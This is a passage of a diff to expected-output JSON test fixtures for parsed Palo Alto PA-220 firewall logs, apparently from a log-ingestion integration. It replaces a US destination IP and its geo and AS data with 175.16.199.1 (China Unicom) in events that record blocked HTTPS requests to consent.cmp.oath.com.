"event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767684792Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691658700Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -351,26 +355,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -386,14 +392,14 @@ "port": 52986, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -408,7 +414,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:c4Xs8aAPhIYB760P+BLmrzOvjv4=" + "community_id": "1:0uWo9yvlQoQKNnEvuve6Og1LTxk=" } }, "threat_category": "unknown", @@ -453,8 +459,8 @@ ], "network": { "community_id": [ - "1:cl1ZW9fCG1bKgQuAww26hYqxyq0=", - "1:c4Xs8aAPhIYB760P+BLmrzOvjv4=" + "1:VzBhECk0ydTWchIzZpKC75545WM=", + "1:0uWo9yvlQoQKNnEvuve6Og1LTxk=" ], "transport": "tcp", "application": "ssl", @@ -493,14 +499,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767689263Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691665300Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -523,26 +529,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -558,14 +566,14 @@ "port": 52985, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -580,7 +588,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:RU/nMZByVkBbsckJ18XtpXhQlPg=" + "community_id": "1:PvQSfe6nzZWVw+NrYwRxCMRMvL0=" } }, "threat_category": "unknown", @@ -625,8 +633,8 @@ ], "network": { "community_id": [ - "1:0KdQcz2+OQg8Kuyqn3tvtzrtAtk=", - "1:RU/nMZByVkBbsckJ18XtpXhQlPg=" + "1:R7n4UdRm/gUAlGQlL7Fpccn5owY=", + "1:PvQSfe6nzZWVw+NrYwRxCMRMvL0=" ], "transport": "tcp", "application": "ssl", @@ -665,14 +673,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767693410Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691671600Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -695,26 +703,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -730,14 +740,14 @@ "port": 52987, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -752,7 +762,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:FTVZK5v5Nqts17X+FJm/bQk1rwM=" + "community_id": "1:qwbEFCglv9cpTPGD4hiS0M8uutY=" } }, "threat_category": "unknown", @@ -797,8 +807,8 @@ ], "network": { "community_id": [ - "1:ZuULYSnnlQSsdqWsfJBHQTPqbJo=", - "1:FTVZK5v5Nqts17X+FJm/bQk1rwM=" + "1:WRRynQ1xM6mmxdkOiP+40arIlVQ=", + "1:qwbEFCglv9cpTPGD4hiS0M8uutY=" ], "transport": "tcp", "application": "ssl", @@ -837,14 +847,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767697438Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691678200Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -867,26 +877,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -902,14 +914,14 @@ "port": 52988, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -924,7 +936,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:iHTY/vpQo2TsRYJW2n+lqb0w5f4=" + "community_id": "1:Pmpf6LjOLh0SyYirl1k3hFePosA=" } }, "threat_category": "unknown", @@ -969,8 +981,8 @@ ], "network": { "community_id": [ - "1:ovf/7i/MclKhY1UKalpHzmmlthk=", - "1:iHTY/vpQo2TsRYJW2n+lqb0w5f4=" + "1:V/JAeqw0ooQcQ73chBLN48vTs7M=", + "1:Pmpf6LjOLh0SyYirl1k3hFePosA=" ], "transport": "tcp", "application": "ssl", @@ -1009,14 +1021,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767701435Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691684500Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -1039,26 +1051,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1074,14 +1088,14 @@ "port": 52990, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -1096,7 +1110,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:f+u5A73xp5gqmRCSN2kCCSbvBRg=" + "community_id": "1:/nHP4plhDk6B4HwFao1CPZ5FSmI=" } }, "threat_category": "unknown", @@ -1141,8 +1155,8 @@ ], "network": { "community_id": [ - "1:K7vLQF60EynWhcmrB6/wjEG8qzI=", - "1:f+u5A73xp5gqmRCSN2kCCSbvBRg=" + "1:+4smeVKey0fUOGrgXKINWjKWl+Y=", + "1:/nHP4plhDk6B4HwFao1CPZ5FSmI=" ], "transport": "tcp", "application": "ssl", @@ -1181,14 +1195,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767705323Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691690800Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -1211,26 +1225,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1246,14 +1262,14 @@ "port": 52989, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -1268,7 +1284,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:v4+MIeqiGJJ9Z3SUTNLFEoYtw74=" + "community_id": "1:b1Z/qQxxzC/dejxbXLBPycQhfw0=" } }, "threat_category": "unknown", @@ -1313,8 +1329,8 @@ ], "network": { "community_id": [ - "1:nMc/XZ2HhyrMMpTfW7UK0Q7QRJM=", - "1:v4+MIeqiGJJ9Z3SUTNLFEoYtw74=" + "1:cSrUZA67JbK4AnelUwSO7ZbtWqw=", + "1:b1Z/qQxxzC/dejxbXLBPycQhfw0=" ], "transport": "tcp", "application": "ssl", @@ -1353,14 +1369,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767739835Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691697200Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -1383,26 +1399,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1418,14 +1436,14 @@ "port": 52992, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -1440,7 +1458,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:BilmVEwf9nQIXodvin3X6lZuVAc=" + "community_id": "1:GeMJJ22IjqKEREFWH9ujsC40jOM=" } }, "threat_category": "unknown", @@ -1485,8 +1503,8 @@ ], "network": { "community_id": [ - "1:UDkY52oWrSsYAqwPSTAKyKhwzvQ=", - "1:BilmVEwf9nQIXodvin3X6lZuVAc=" + "1:VYpbhu7GfNUjHQ4icqy9IeYHUUs=", + "1:GeMJJ22IjqKEREFWH9ujsC40jOM=" ], "transport": "tcp", "application": "ssl", @@ -1525,14 +1543,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + 